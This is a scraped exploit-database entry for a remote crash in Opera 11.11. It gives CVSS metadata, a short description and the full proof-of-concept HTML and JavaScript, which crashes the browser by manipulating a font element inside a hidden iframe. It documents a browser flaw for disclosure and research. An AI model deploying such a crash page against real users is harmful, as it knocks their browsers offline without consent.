header-logo
Suggest Exploit
vendor:
Opera
by:
null
CVSS
LOW
Remote Crash
20
CWE
Product Name: Opera
Affected Version From: 11.11
Affected Version To: 11.11
Patch Exists: NO
Related CWE: null
CPE: opera:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win32 XP Home SP 3
null

Opera 11.11 Remote Crash

This exploit causes a remote crash in Opera 11.11. It is done by creating a font element in an iframe with an id of 'bo0om' and setting the face attribute to 'h3h' after a 500 millisecond delay.

Mitigation:

No mitigation is necessary as this exploit is not exploitable.
Source

Exploit-DB raw data:

<html>
  <body>
   <iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
   <script type="text/javascript"  language="javascript">
  
    /*
    *               
    * Opera 11.11 Remote  Crash 
    * Software link: http://www.opera.com/download/
    * Tested on: Win32 xp home sp 3    
    * CVE : null
    *         
    * Im too lazy to deep analyze this ,but i thing is just unexploitable crash 
    * so f****jixvt
    *      ( dla klechis³awa i jego kosiarki :i )
    *    
    */                
  
      var a = window.document.getElementById('bo0om');
      var b = a.contentDocument.createElement('font');
      a.src='about:blank';
      setTimeout('b.face = "h3h";',500);
      
   </script>
  </body>
</html>